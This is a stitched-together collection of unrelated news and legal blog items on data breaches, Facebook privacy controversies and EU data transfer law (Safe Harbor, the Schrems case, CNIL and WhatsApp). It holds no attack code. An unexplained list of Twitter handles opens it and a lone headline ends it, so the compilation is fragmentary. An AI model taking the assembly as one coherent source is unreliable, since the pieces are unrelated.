@UsaUsafortrump, @USAForDTrump, @TrumpWithUSA, @TrumpMov, @POTUSADJT, @imdeplorable201, @swampdrainer659, @maga2017trump, @TXCowboysRawk, @covfefeNationUS, @wokeluisa (2,000 tweets and at least 55,000 followers), @JohnCopper16, @Amconvoice, @TheTrainGuy13, @KaniJJackson, @JemiSHaaaZzz 




Facebook’s confusion about its Portal camera is concerning

Facebook couldn't have picked a worse time to introduce Portal, a camera-equipped smart display designed to make video chatting in your home easier. And, if the rumors are true, the company is reportedly also preparing to launch a video chat camera for your TV, based on the same system as Portal. Not only does news of this hardware come at a time when when Facebook is under major scrutiny after suffering a massive data breach in September, which exposed private information of 29 million users, including usernames, birth date, gender, location, religion and the devices used to browse the site. But the most concerning part about Portal, is that Facebook's own executives don't seem to have a basic understanding of what types of data the company will be collecting or what it will be using it for.

WSJ: Facebook believes spammers were behind its massive data breach

More than two weeks after Facebook revealed a massive data breach, we still don't know who was using the flaw in its site to access information on tens of millions of users. Now the Wall Street Journal reports, based on anonymous sources, that the company believes spammers perpetrated the hack in an attempt to make money via deceptive advertising.

Source: Wall Street Journal

Cyber Security Roundup for September 2018

September 2018 started with a data breach bang, with British Airways disclosing a significant hack and data loss. 380,000 of the airlines' website and mobile app customers had their debit and credit card details lifted via a maliciously injected script.  The breach even caused BA owners, IAG, to drop in value 4%. And to compound matters, there were several claims made that the BA website wasn't PCI DSS compliant, implying if they were PCI DSS compliant, their customer's personal and payment card information would still be safe.  For further details about this breach see my blog posts; British Airways Customer Data Stolen in Website and Mobile App Hack and British Airways Hack Update: Caused by Injected Script & PCI DSS Non-Compliance is Suspected.

Facebook continues to make all the wrong kind of privacy headlines after a massive user data breach was confirmed by the social media giant at the end of the month. Facebook said at least 50 million users’ data was at risk after hackers exploited a vulnerability the Facebook code. Facebook CEO Mark Zuckerberg said he doesn’t know who is behind the cyber attack, however, the FBI are investigating. 

There was a good measure of embarrassment at the Tory Conference after a flaw in the conference App revealed the personal data of senior UK government cabinet ministers, with Boris Johnson, Michael Gove, Gavin Williamson among those whose their personal information and phones numbers made available.

There was a number of large data breach fines handed out in September, Tesco Bank was hit by a whopping £16.4 by the Financial Conduct Authority (FCA), the fine would have been doubled if it weren't for Tesco's good co-operation with the FCA investigation. The FCA said Tesco had security deficiencies which left their bank account holders vulnerable to a cyber attack in November 2016. The attack netted the bad guys, via 34 transactions, a cool £2.26 million. The FCA report said the cyber criminals had exploited weaknesses in the bank's design of its debit card, its financial crime controls and in its financial crime operations team, to carry out the attack over a 48-hour period. 

Equifax was fined the maximum pre-GDPR law amount of £500K by the Information Commissioner's Office (ICO) after the US-based credit reference agency failed to protect the personal data of 15 million UK citizens. The ICO ruled Equifax's UK branch had "failed to take appropriate steps" to protect UK citizens' data. It added that "multiple failures" meant personal information had been kept longer than necessary and left vulnerable.

The ICO also fined Bupa £175K, for not having good enough security to prevent the theft of 547,000 customer records by an employee.  Uber has paid £133m to settle legal claims to customers and drivers, as a result of trying to cover up a huge breach which occurred in 2016 from their regulators. The ride-hailing company admitted to paying off hackers to the tune of $100,000 to delete the data they robbed from Uber's cloud servers. The personal data stolen was from 57 million Uber accounts, also included information about 600,000 driving license numbers. 

Looks like the MoD and GCHQ are looking to beef up Britan's Cyber Offense capabilities, announcing a plan to recruit a 2,000 strong 'cyber force' to take on the Russian threat. Meanwhile across the pond, the Mirai creators have done a deal to keep themselves out of jail in return for helping the FBI catch cybercrooks, which has echoes of the approach the FBI took with con artist and cheque fraud expert Frank Abagnale, the subject of book and movie "Catch me if you Can".

Bristol Airport was impacted by a ransomware attack, which took down their arrival and departure screens for a couple of days, and a Scottish Brewery was also hit by ransomware attack through infected CV it had received through an online job advertisement

Europol warned of 15 ways you could become a Cyber Crime Victim, and there was an excellent article in the New York Times on the Bangladesh’s Central Bank Cyber Theft

NEWS
AWARENESS, EDUCATION AND THREAT INTELLIGENCE

Facebook Announces Security Flaw Found in “View As” Feature

Another day, another Facebook story. In May, a Facebook Messenger malware named FacexWorm was utilized by cybercriminals to steal user passwords and mine for cryptocurrency. Later that same month, the personal data of 3 million users was exposed by an app on the platform dubbed myPersonality. And in June, millions of the social network’s users may have unwittingly shared private posts publicly due to another new bug. Which brings us to today. Just announced this morning, Facebook revealed they are dealing with yet another security breach, this time involving the “View As” feature.

Facebook users have the ability to view their profiles from another user’s perspective, which is called “View As.” This very feature was found to have a security flaw that has impacted approximately 50 million user accounts, as cybercriminals have exploited this vulnerability to steal Facebook users’ access tokens. Access tokens are digital keys that keep users logged in, and they permit users to bypass the need to enter a password every time. Essentially, this flaw helps cybercriminals take over users’ accounts.

While the access tokens of 50 million accounts were taken, Facebook still doesn’t know if any personal information was gathered or misused from the affected accounts. However, they do suspect that everyone who used the “View As” feature in the last year will have to log back into Facebook, as well as any apps that used a Facebook login. An estimated 90 million Facebook users will have to log back in.

As of now, this story is still developing, as Facebook is still investigating further into this issue. Now, the question is — if you’re an impacted Facebook user, what should you do to stay secure? Start by following these tips:

  • Change your account login information. Since this flaw logged users out, it’s vital you change up your login information. Be sure to make your next password strong and complex, so it will be difficult for cybercriminals to crack. It also might be a good idea to turn on two-factor authentication.
  • Update, update, update. No matter the application, it can’t be stressed enough how important it is to always update an app as soon as an update is available, as fixes are usually included with each version. Facebook has already issued a fix to this vulnerability, so make sure you update immediately.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Facebook Announces Security Flaw Found in “View As” Feature appeared first on McAfee Blogs.

Plaintiffs File Class Action Lawsuit Against Nielsen Over Alleged False and Misleading Statements

On August 28, 2018, plaintiffs filed a class action lawsuit against Nielsen Holdings PLC (“Nielsen”) and some of its officers and directors for making allegedly materially false and misleading statements to investors about the impact of privacy regulations and third-party business partners’ privacy policies on the company’s revenues and earnings. The case was filed in the United States District Court for the Southern District of New York. 

The complaint alleges that Nielsen made false and/or misleading statements and/or failed to disclose that: (1) Nielsen recklessly disregarded its readiness for and the true risks of privacy-related regulations and policies, including the EU General Data Protection Regulation (“GDPR”), on its current and future financial and growth prospects; (2) Nielsen’s financial performance was far more dependent on Facebook and other third-party large data set providers than previously disclosed, and privacy policy changes affected the scope and terms of access Nielsen would have had to third-party data; and (3) access to Facebook and other third-party provider data was becoming increasingly restricted for Nielsen and Nielsen clients. Plaintiffs allege that, as a result, Nielsen’s public statements were materially false and misleading at all relevant times.

The complaint maintains that, because of Nielsen’s “material misrepresentations and omissions, Nielsen stock traded at artificially inflated prices.” The complaint further alleges that when Nielsen published its financial results for the second quarter of 2018 announcing that it missed revenue and earnings targets, its stock plummeted, which caused substantial harm to the plaintiffs who were investors in Nielsen stock. In that announcement, Nielsen cited the impact of the GDPR on the company’s results and announced that its CEO and Executive Chairman, Mitch Barns, would retire from the company at the end of 2018.

Read the complaint.

Cyber Security Roundup for July 2018

The importance of assuring the security and testing quality of third-party provided applications is more than evident when you consider an NHS reported data breach of 150,000 patient records this month. The NHS said the breach was caused by a coding error in a GP application called SystmOne, developed by UK based 'The Phoenix Partnership' (TTP). The same assurances also applies to internally developed applications, case-in-point was a publically announced flaw with Thomas Cook's booking system discovered by a Norwegian security researcher. The research used to app flaw to access the names and flights details of Thomas Cook passengers and release details on his blog. Thomas Cook said the issue has since been fixed.

Third-Third party services also need to be security assured, as seen with the Typeform compromise. Typeform is a data collection company, on 27th June, hackers gained unauthorised access to one of its servers and accessed customer data. According to their official notification, Typeform said the hackers may have accessed the data held on a partial backup, and that they had fixed a security vulnerability to prevent reoccurrence. Typeform has not provided any details of the number of records compromised, but one of their customers, Monzo, said on its official blog that is was in the region of 20,000. Interestingly Monzo also declared ending their relationship with Typeform unless it wins their trust back. Travelodge one UK company known to be impacted by the Typeform breach and has warned its impacted customers. Typeform is used to manage Travelodge’s customer surveys and competitions.

Other companies known to be impacted by the Typeform breach include:

The Information Commissioner's Office (ICO) fined Facebook £500,000, the maximum possible, over the Cambridge Analytica data breach scandal, which impacted some 87 million Facebook users. Fortunately for Facebook, the breach occurred before the General Data Protection Regulation came into force in May, as the new GDPR empowers the ICO with much tougher financial penalties design to bring tech giants to book, let's be honest, £500k is petty cash for the social media giant.
Facebook-Cambridge Analytica data scandal
Facebook reveals its data-sharing VIPs
Cambridge Analytica boss spars with MPs

A UK government report criticised the security of Huawei products, concluded the government had "only limited assurance" Huawei kit posed no threat toUK national security. I remember being concerned many years ago when I heard BT had ditched US Cisco routers for Huawei routers to save money, not much was said about the national security aspect at the time. The UK gov report was written by the Huawei Cyber Security Evaluation Centre (HCSEC), which was set up in 2010 in response to concerns that BT and other UK companies reliance on the Chinese manufacturer's devices, by the way, that body is overseen by GCHQ.

Banking hacking group "MoneyTaker" has struck again, this time stealing a reported £700,000 from a Russia bank according to Group-IB. The group is thought to be behind several other hacking raids against UK, US, and Russian companies. The gang compromise a router which gave them access to the bank's internal network, from that entry point, they were able to find the specific system used to authorise cash transfers and then set up the bogus transfers to cash out £700K.


NEWS

Cyber Security Roundup for April 2018

The fallout from the Facebook privacy scandal rumbled on throughout April and culminated with the closure of the company at the centre of the scandal, Cambridge Analytica.
Ikea was forced to shut down its freelance labour marketplace app and website 'TaskRabbit' following a 'security incident'. Ikea advised users of TaskRabbit to change their credentials if they had used them on other sites, suggesting a significant database compromise.

TSB bosses came under fire after a botch upgraded to their online banking system, which meant the Spanished owned bank had to shut down their online banking facility, preventing usage by over 5 million TSB customers. Cybercriminals were quick to take advantage of TSB's woes.

Great Western Railway reset the passwords of more than million customer accounts following a breach by hackers, US Sun Trust reported an ex-employee stole 1.5 million bank client records, an NHS website was defaced by hackers, and US Saks, Lord & Taylor had 5 million payment cards stolen after a staff member was successfully phished by a hacker.

The UK National Cyber Security Centre (NCSC) blacklist China's state-owned firm ZTE, warning UK telecom providers usage of ZTE's equipment could pose a national security risk. Interestingly BT formed a research and development partnership with ZTE in 2011 and had distributed ZTE modems. The NCSC, along with the United States government, released statements accusing Russian of large-scale cyber-campaigns, aimed at compromising vast numbers of the Western-based network devices.

IBM released the 2018 X-Force Report, a comprehensive report which stated for the second year in a row that the financial services sector was the most targeted by cybercriminals, typically by sophisticated malware i.e. Zeus, TrickBot, Gootkit. NTT Security released their 2018 Global Threat Intelligence Report, which unsurprisingly confirmed that ransomware attacks had increased 350% last year.  

A concerning report by the EEF said UK manufacturer IT systems are often outdated and highly vulnerable to cyber threats, with nearly half of all UK manufacturers already had been the victim of cybercrime. An Electropages blog questioned whether the boom in public cloud service adoption opens to the door cybercriminals.

Finally, it was yet another frantic month of security updates, with critical patches released by Microsoft, Adobe, Apple, Intel, Juniper, Cisco, and Drupal.

NEWS
AWARENESS, EDUCATION AND THREAT INTELLIGENCE
REPORTS

Weekly Cyber Risk Roundup: Orbitz Breach, Facebook Privacy Fallout

One of the biggest data breach announcements of the past week belonged to Orbitz, which said on Tuesday that as many as 880,000 customers may have had their payment card and other personal information compromised due to unauthorized access to a legacy Orbitz travel booking platform.

“Orbitz determined on March 1, 2018 that there was evidence suggesting that, between October 1, 2017 and December 22, 2017, an attacker may have accessed certain personal information, stored on this consumer and business partner platform, that was submitted for certain purchases made between January 1, 2016 and June 22, 2016 (for Orbitz platform customers) and between January 1, 2016 and December 22, 2017 (for certain partners’ customers),” the company said in a statement.

Information potentially compromised includes payment card information, names, dates of birth, addresses, phone numbers, email addresses, and gender.

As American Express noted in its statement about the breach, the affected Orbitz platform served as the underlying booking engine for many online travel websites, including Amextravel.com and travel booked through Amex Travel Representatives.

Expedia, which purchased Orbitz in 2015, did not say how many or which partner platforms were affected by the breach, USA Today reported. However, the company did say that the current Orbitz.com site was not affected.

2018-03-24_ITTGroups

Other trending cybercrime events from the week include:

  • State data breach notifications: Island Outdoor is notifying customers that payment card information may have been stolen due to the discovery of malware affecting several of its websites. Agemni is notifying customers about unauthorized charges after “a single authorized user of our software system used customer information to make improper charges for his personal benefit.” The Columbia Falls School District is notifying parents of a cyber-extortion threat involving their children’s personal information. Intuit is notifying TurboTax customers that their accounts may have been accessed by an actor leveraging previously leaked credentials. Taylor-Dunn Manufacturing Company is notifying customers that it discovered cryptocurrency mining malware on a server and that a file containing personal information of those registered for the Taylor-Dunn customer care or dealer center may have been accessed. Nampa School District is notifying a “limited number” of employees and Skamania Public Utility District is notifying customers that their personal information may have been compromised due to incidents involving unauthorized access to an employee email account.
  • Data exposed: A flaw in Telstra Health’s Argus software, which is used by more than 40,000 Australian health specialists, may have exposed the medical information of patients to hackers. Primary Healthcare is notifying patients of unauthorized access to four employee email accounts. More than 300,000 Pennsylvania school teachers may have had their personal information publicly released due to an employee error involving the Teacher Management Information System.
  • Notable ransomware attacks: The city of Atlanta said a ransomware attack disrupted internal and customer-facing applications, which made it difficult for citizens to pay bills and access court-related information. Atrium Hospitality is notifying 376 hotel guests that their personal information may have been compromised due to a ransomware infection at a workstation at the Holiday Inn Sacramento. Finger Lakes Health said it lost access to its computer system due to ransomware infection.
  • Other notable events: Frost Bank said that malicious actors comprised a third-party lockbox software program and were able to access images of checks that were stored in the database. National Lottery users are being advised to change their passwords after 150 accounts were affected by a “low-level” hack. A lawsuit against Internet provider CenturyLink and AT&T-owned DirecTV alleges that customer data was available through basic Internet searches.

SurfWatch Labs collected data on many different companies tied to cybercrime over the past week. Some of the top trending targets are shown in the chart below.

2018-03-24_ITT

Cyber Risk Trends From the Past Week

2018-03-24_RiskScoresFacebook has faced a week of criticism, legal actions, and outcry from privacy advocates after it was revealed that the political consulting Cambridge Analytica had accessed the information of 50 million users and leveraged that information while working with the Donald Trump campaign in 2016.

“Cambridge Analytica obtained the data from a professor at the University of Cambridge who had collected the information by creating a personality-quiz app in 2013 that plugged into Facebook’s platform,” The Wall Street Journal reported. “Before a policy change in 2015, Facebook gave app creators and academics access to a treasure trove of data, ranging from which pages users liked to details about their friends.”

It isn’t clear how many other developers might have retained information harvested from Facebook before the 2015 policy change, The Journal reported. However, Mark Zuckerberg said the company may spend “many millions of dollars” auditing tens of thousands of data collecting apps in order to get a better handle on the situation.

The privacy breach has already led to regulatory scrutiny and potential lawsuits around the globe. Bloomberg reported that the FTC is probing whether data handling violated terms of a 2011 consent decree. In addition, Facebook said it would conduct staff-level briefings with six congressional committees in the coming week. Some lawmakers have called for Zuckerberg to testify as well, and Zuckerberg told media outlets that he would be willing to do so if asked.

Facebook’s stock price has dropped from $185 to $159 over the past eight days amid the controversy, and several companies have suspended their advertising on Facebook or deleted their Facebook pages altogether due to the public backlash.

Facebook Publishes Privacy Principles and Announces Introduction of Privacy Center

On January 28, 2018, Facebook published its privacy principles and announced that it will centralize its privacy settings in a single place. The principles were announced in a newsroom post by Facebook’s Chief Privacy Officer and include:

  • “We give you control of your privacy.”
  • “We help people understand how their data is used.”
  • “We design privacy into our products from the outset.”
  • “We work hard to keep your information secure.”
  • “You own and can delete your information.”
  • “Improvement is constant.”
  • “We are accountable.”

In conjunction with the publication of the privacy principles, Facebook also announced the creation of a new privacy center and an educational video campaign for its users that focuses on advertising, reviewing and deleting old posts, and deleting accounts. The videos will appear in users’ news feeds and will be refreshed throughout the year.

The CNIL Serves Formal Notice to WhatsApp Regarding Sharing Data with Facebook

On December 18, 2017, the French data protection authority (“CNIL”) publicly announced that it served a formal notice to WhatsApp regarding the sharing of WhatsApp users’ data with Facebook Inc. (“Facebook”). This decision, dated November 27, 2017, follows the CNIL’s investigations regarding Facebook’s 2014 acquisition of WhatsApp. In 2016, WhatsApp updated its Terms of Service and Privacy Policy to reflect the sharing of information with Facebook. Following this update, the Article 29 Working Party (“Working Party”) requested explanations from WhatsApp on its data processing practices and data sharing, and asked the company to stop sharing data for targeted advertising purposes. The Working Party also gave a mandate to its subgroup in charge of the cooperation on investigations and sanctions to coordinate actions of the relevant national data protection authorities. It is in that context that the CNIL started its investigation of WhatsApp’s data processing practices.

In its decision, the CNIL found that WhatsApp violated the French Data Protection Act of January 6, 1978, as amended (Loi relative à l’informatique, aux fichiers et aux libertés) by: (1) sharing data with Facebook without an appropriate legal basis, (2) not providing sufficient notice to the relevant data subjects, and (3) not cooperating with the CNIL during the investigation.

Lack of Legal Basis

While WhatsApp shares its users’ data with Facebook for both business intelligence and security purposes, the CNIL focused its analysis on the “business intelligence” purpose. WhatsApp represented that such sharing was based on consent and legitimate interest as legal grounds. In its analysis of both legal bases, the CNIL concluded that:

  • WhatsApp cannot rely on consent to share users’ data with Facebook for “business intelligence” purposes on the grounds that: (1) the consent is not specific enough, and only refers to the messaging service and improving Facebook’s services, and (2) the consent is not freely given, as the only way for a user to object to such processing is to uninstall the application.
  • WhatsApp cannot rely on a legitimate interest to share users’ data with Facebook for “business intelligence” purposes because the company has not implemented sufficient safeguards to preserve users’ interests or fundamental rights. There is no mechanism for the users to refuse the data sharing while continuing to use the application.

Lack of Notice to Data Subjects

The CNIL found that WhatsApp did not provide sufficient notice on the registration form to data subjects about sharing personal data with Facebook.

Lack of Cooperation with the CNIL

The CNIL found that WhatsApp did not provide necessary cooperation during the investigation, such as refusing to provide the CNIL with data pertaining to a sample of French users on the basis that such request conflicts with U.S. law.

The CNIL’s Requests

In its formal notice, the CNIL requires WhatsApp to, within one month:

  • cease sharing users’ data with Facebook for the purpose of “business intelligence” without a legal basis;
  • provide a notice to data subjects that complies with the French Data Protection Act, and informs them of the purposes for which the data is shared with Facebook and their rights as data subjects;
  • provide the CNIL with all the sample personal data requested (i.e., all data shared by WhatsApp with Facebook for a sample of 1,000 French users); and
  • confirm that the company has complied with all of the CNIL’s requests above within the one month deadline.

If WhatsApp fails to comply with the terms of the formal notice within one month, the CNIL may appoint an internal investigator, who may propose that the CNIL imposes sanctions against the company for violations of the French Data Protection Act.

Advocate General Rejects Facebook’s Claim of Sole Irish Jurisdiction in EU

On October 24, 2017, an opinion issued by the EU’s Advocate General Bot (“Bot”) rejected Facebook’s assertion that its EU data processing activities fall solely under the jurisdiction of the Irish Data Protection Commissioner. The non-binding opinion was issued in relation to the CJEU case C-210/16, under which the German courts sought to clarify whether the data protection authority (“DPA”) in the German state of Schleswig-Holstein could take action against Facebook with respect to its use of web tracking technologies on a German education provider’s fan page without first providing notice.

Although Facebook’s EU data processing activities are handled jointly by Facebook, Inc. in the U.S. and Facebook Ireland, its European headquarters, Facebook has a number of subsidiaries in other EU Member States that promote and sell advertising space on the social network. In line with Directive 95/46/EC and the Google Spain decision, Bot held that the processing of personal data via cookies, which Facebook used to improve its targeting of advertisements, had to be considered as being in the context of the activities of the German establishment. It therefore followed that Facebook fell under the jurisdiction of the German DPA and other DPAs in which its subsidiaries engaged in the promotion and sale of advertising space.

The opinion is non-binding and Facebook awaits the CJEU’s verdict. It should be noted, however, that most CJEU verdicts follow the prior opinions of Advocate Generals. Also, this situation may be interpreted differently under the EU’s General Data Protection Regulation (“GDPR”), which replaces existing EU Member State data protection laws based on Directive 95/46/EC when it enters into force on May 25, 2018. Under the GDPR, the One-Stop-Shop mechanism will see the DPA in an organization’s main EU establishment take the role of lead authority. In other EU Member States where the organization has establishments, DPAs will be regarded as ‘concerned authorities,’ but any regulatory action will be driven by the lead authority—which in Facebook’s case likely is the Irish Data Protection Commissioner.

WhatsApp Updates Privacy Policy to Share Information with Facebook

On August 25, 2016, WhatsApp announced in a blog post that the popular mobile messaging platform updated its Terms of Service and Privacy Policy to permit certain information sharing with Facebook. After Facebook acquired WhatsApp in 2014, the Director of the FTC’s Bureau of Consumer Protection wrote a letter to both Facebook and WhatsApp that discussed the companies’ obligations to honor privacy statements made to consumers in connection with the acquisition.

WhatsApp has developed FAQs that discuss the changes to the Terms of Service and Privacy Policy. In addition to describing new product features, such as WhatsApp Calling, the FAQs describe the new information sharing with Facebook. WhatsApp will begin to share users’ phone numbers that are registered with WhatsApp, as well as the last time that individuals used the service. According to the update, WhatsApp will not disclose the content of any messages or photos sent via WhatsApp to Facebook.

The information disclosed to Facebook will be used for several purposes. These include enabling WhatsApp and Facebook to (1) more accurately count users, (2) fight spam and abuse, and (3) improve user experiences across WhatsApp and Facebook services, such as providing better friend suggestions and more relevant ads on Facebook. WhatsApp will provide its users with the ability to opt out from sharing information with Facebook for the purpose of improving Facebook ads and product experiences.

U.S. Government Seeks to Join Schrems Case

On June 13, 2016, the U.S. government expressed its wish to join the legal proceedings brought by Max Schrems concerning the validity of international data transfers under EU Standard Contractual Clauses.

Along with the U.S. government, the Irish Business and Employers Confederation and the Business Software Alliance, an industry trade group, also informed Ireland’s High Court of their desire to be added to the case as amici curiae, or “friends of the court.”

Each party will now have two weeks to file a motion seeking permission to be heard as an amicus curiae. If granted, the party will be allowed to file a written brief, which the High Court can take into account.

UK Deputy Information Commissioner on Safe Harbor: “Don’t Panic”

On October 27, 2015, David Smith, the UK Deputy Commissioner of the Information Commissioner’s Office (“ICO”), published a blog post commenting on the ongoing Safe Harbor compliance debate in light of the Schrems v. Facebook decision of the Court of Justice of the European Union. His key message to organizations was, “Don’t panic.”

After engaging in a brief analysis of the implications of the decision, David Smith asked, “Where does this leave businesses that are using the Safe Harbor?” Smith sums up the ICO’s advice in three key messages:

  • Don’t Panic: The impact of the Schrems decision on other available transfer mechanisms and derogations (e.g. Standard Contractual Clauses, Binding Corporate Rules, consent, etc.) is still being evaluated.
  • Take Stock: Organizations should, as a first step, consider what personal data they are transferring outside of the EU, and what arrangements they have in place to ensure that data is adequately protected. Organizations should also consider the ICO’s guidance on international data transfers, and what alternatives are available in respect of transfers that were previously covered by Safe Harbor. Smith notes the possibility that a new, improved Safe Harbor may be agreed upon, and cautions against significant immediate changes in light of this possibility.
  • Make Up Your Own Mind: Smith highlights the fact that UK data protection law allows organizations to make their own adequacy determination in relation to particular transfers of personal data. Although this possibility is very fact dependent, the ICO confirms that this transfer mechanism remains open to UK-based organizations.

Finally, Smith notes that, although the ICO will consider complaints in relation to data transfers from affected individuals, it will continue to follow its previously published enforcement criteria. The blog post provides reassurance to UK-based organizations that the ICO will not rush to use its enforcement powers, particularly in light of the uncertainty around international transfers of personal data and the future of Safe Harbor. That being said, the ICO stands behind the previous statement issued by the Article 29 Working Party in relation to the Schrems decision, and did not rule out the possibility of enforcement action against organizations that have not taken steps to ensure compliance by January 2016.

Irish Data Protection Authority to Investigate Facebook’s Data Transfers

On October 20, 2015, at a hearing in the Irish High Court, Irish Data Protection Commissioner Helen Dixon confirmed that she will investigate allegations made by privacy activist Max Schrems concerning Facebook’s transfer of personal data to the U.S. in reliance on Safe Harbor. Dixon welcomed the ruling of the High Court and noted that she would proceed to “investigate the substance of the complaint with all due diligence.”

In 2013, Schrems complained to the Irish Data Protection Commissioner (“DPC”) that Facebook’s transfers of personal data to the U.S. were unlawful. The DPC declined to investigate Facebook, on the basis that such an investigation was outside the DPC’s remit. Schrems sought judicial review of that decision and, in the course of hearing Schrems’ complaint, the Irish High Court referred several questions to the Court of Justice of the European Union (“CJEU”). In response to those questions, the CJEU determined that the European Commission’s Safe Harbor Decision is invalid.

In light of the CJEU’s judgment, the DPC’s investigation is expected to conclude that Facebook cannot rely upon the U.S.-EU Safe Harbor Framework as a lawful basis for transferring data to the U.S. The wider consequences for Facebook and other businesses that had until recently relied upon the Safe Harbor, however, remain to be seen. Hunton & Williams has provided further insight into the practical next steps that organizations should consider at this stage.

German DPA Issues Position Paper on Data Transfer Mechanisms in Light of CJEU Safe Harbor Decision

On October 14, 2015, the data protection authority (“DPA”) in the German state of Schleswig-Holstein (Unabhängiges Landeszentrum für Datenschutz) issued a position paper (the “Position Paper”) on the Safe Harbor Decision of the Court of Justice of the European Union (the “CJEU”).

In the Position Paper, the DPA disagrees with the European Commission’s (the “Commission’s”) opinion that alternative data transfer mechanisms may be used in place of Safe Harbor. According to the Position Paper, mechanisms such as consent and EU standard contractual clauses that are currently being discussed should be evaluated in a new way. This evaluation must focus on the principles established by the CJEU, in particular the comparable legal level of protection. The Position Paper indicates that a long-term solution would require a significant change in U.S. law. It is unknown whether other German DPAs will concur with the Position Paper.

It should be noted that the Position Paper is the opinion of only one DPA in Germany, which is known to be conservative. The Position Paper does not invalidate any prior adequacy decisions made by the Commission. As the CJEU held in Schrems v. Facebook, DPAs in the Member States cannot invalidate Commission adequacy decisions.

The Position Paper discusses the recent Schrems v. Facebook decision that invalidated the U.S.-EU Safe Harbor Framework as a data transfer mechanism. The Position Paper notes that there are limited options for the Commission to take with respect to data transfers to the U.S. in the wake of the Schrems decision. These options, however, would require the U.S. to implement comprehensive changes to U.S. law which may be unlikely in the short or medium-term.

With respect to alternative data transfer mechanisms, the Position Paper concludes the following:

  • Consent: The Position Paper notes that individuals must provide effective informed consent. According to the Position Paper, this entails providing individuals with comprehensive information on the lack of personal data protection in the U.S., including (1) the ability and wide-ranging power of the U.S. government to access their data, (2) the lack of data subjects’ rights, and (3) the general failure of the U.S. to adhere to the purpose limitation and necessity principles that are embedded in EU law. Given these issues, especially what it deems groundless mass surveillance conducted by U.S. intelligence agencies, the Position Paper concludes that consent may not be an option to provide a legal basis for data transfers to the U.S.
  • Performance of a Contract: The Position Paper notes that contractual and necessary data transfers between the data subject and the data controller, such as providing data to book travel arrangements, are permissible. The Position Paper, however, indicates that this legal ground would not provide a legal basis for transfers of employee personal data that may be processed in the U.S. for purposes related to employee performance or behavior control.
  • EU Standard Contractual Clauses: With respect to standard contractual clauses as a legal basis for transferring personal data to the U.S., the Position Paper refers to Commission decision 201/87/EU of February 5, 2010 (controller-to-processor data transfers) and Commission decision 2001/497/EC of June 15, 2001 (controller-to-controller transfers). In these decisions, a data importer must agree that it has no reason to believe that any applicable laws will prevent it from fulfilling the instructions and contractual obligations of the data exporter. If that is not the case, then the data exporter has the right to suspend the transfer of data and/or terminate the contract. Therefore, the Position Paper states that data exporters must consider exercising those rights.

Investigations by the DPA

The Position Paper indicates that the Schleswig-Holstein DPA is considering using the power granted to it by Article 4 of Commission decision 201/87/EU of February 5, 2010 to “prohibit or suspend data flows to third countries in order to protect individuals with regard to the processing of their personal data,” if the data importer is not able to comply with EU data protection law, or if the requirements of Article 13 of the EU Data Protection Directive 95/46/EC are not satisfied. The Position Paper further states that data transfers to the U.S. without a legal basis constitute an administrative offense and may be sanctioned with a fine of up to 300,000 EUR.

The Position Paper concludes by noting that the Schleswig-Holstein DPA will assess whether it has to issue administrative orders to prohibit or suspend data transfers and examine whether any offenses have been committed as a result of transferring personal data to the U.S. that does not guarantee an adequate level of data protection.

CJEU Declares the Commission’s U.S. Safe Harbor Decision Invalid

On October 6, 2015, the Court of Justice of the European Union (the “CJEU”) issued its judgment in the Schrems v. Facebook case, following the Opinion of the Advocate General published on September 23, 2015. In its judgment, the CJEU concluded that:

  • The national data protection authorities (“DPAs”) have the power to investigate and suspend international data transfers even where the European Commission (the “Commission”) has adopted a decision finding that a third country affords an adequate level of data protection, such as Decision 2000/520 on the adequacy of the protection provided by the Safe Harbor Privacy Principles (the “Safe Harbor Decision”).
  • The Safe Harbor Decision is invalid.

Powers of National Authorities

The CJEU concluded that a decision of the European Commission on the adequacy level of data protection provided by a non-EU country cannot eliminate or reduce the powers granted to DPAs under the EU Data Protection Directive 95/46/EC. DPAs therefore can suspend international data transfers made under the Safe Harbor Framework following an investigation. The Court, however, also stated that the CJEU alone has the ultimate jurisdiction to examine the validity of a Commission adequacy decision.

Validity of U.S.-EU Safe Harbor Framework

In its judgment, the CJEU also assessed the validity of the Safe Harbor Decision. The CJEU observed that the Safe Harbor Framework solely applies to U.S. undertakings which adhere to it, leaving out of scope U.S. public authorities. In addition, national security, public interest and law enforcement requirements prevail over the Safe Harbor Framework. When a conflict arises with respect to these requirements, the U.S. undertakings are obligated to disregard the existing protective rules. The CJEU further concluded that U.S. legislation does not limit interference with individual’s rights to what is strictly necessary. Notably, the CJEU indicated that U.S. legislation authorizes on a general basis, storage of all personal data of all the persons whose data is transferred from the EU to the U.S. without any differentiation, limitation or exception being made in light of the objectives pursued, and without providing an objective criterion for determining limits to the access and use of this data by public authorities.

The CJEU further observed that the Safe Harbor Framework does not provide sufficient legal remedies to allow individuals to access their personal data and to obtain rectification or erasure of such data. This compromises the fundamental right to effective judicial protection, according to the CJEU.

Finally, the CJEU stated that the Safe Harbor Decision restricts the powers of DPAs to investigate the validity of the Decision and the Commission lacked competence to do so. For all of the reasons set forth above, the CJEU declared the Safe Harbor Decision invalid.

Next Steps

Following the judgment of the CJEU, the Irish DPA is required to examine, with all due diligence, whether the transfer of data of Facebook’s European users to the U.S. should be suspended given that the level of protection provided by the U.S. for data transferred under the U.S.-EU Safe Harbor Framework is no longer adequate.

The Article 29 Working Party, the UK Information Commissioner’s Office and the Spanish DPA have already published statements on the CJEU’s judgment explaining that they will work with other EU DPAs to issue further guidance for businesses and clarify the impact of the judgment on businesses.

View the full text of the CJEU’s judgment.

For a summary, please see the press release of the CJEU.

CJEU Announces Date for Judgment on Safe Harbor

On September 29, 2015, the Court of Justice of the European Union (“CJEU”) announced that it will deliver its judgment in the Schrems vs. Facebook case on October 6, 2015. The CJEU’s judgment will be the final ruling in the case, and comes after the Advocate General’s Opinion regarding Safe Harbor earlier this week.

Typically, the CJEU delivers its ruling approximately three to six months after publication of the Advocate General’s opinion. Therefore, the timing of the CJEU’s judgment in this case is unexpected. The exact reasons for the early date are unclear, but the judgment will be very timely in light of the ongoing renegotiations of the U.S.-EU Safe Harbor Framework between the European Commission and the U.S. government.

States Writing Biometric-Capture Laws May Look to Illinois

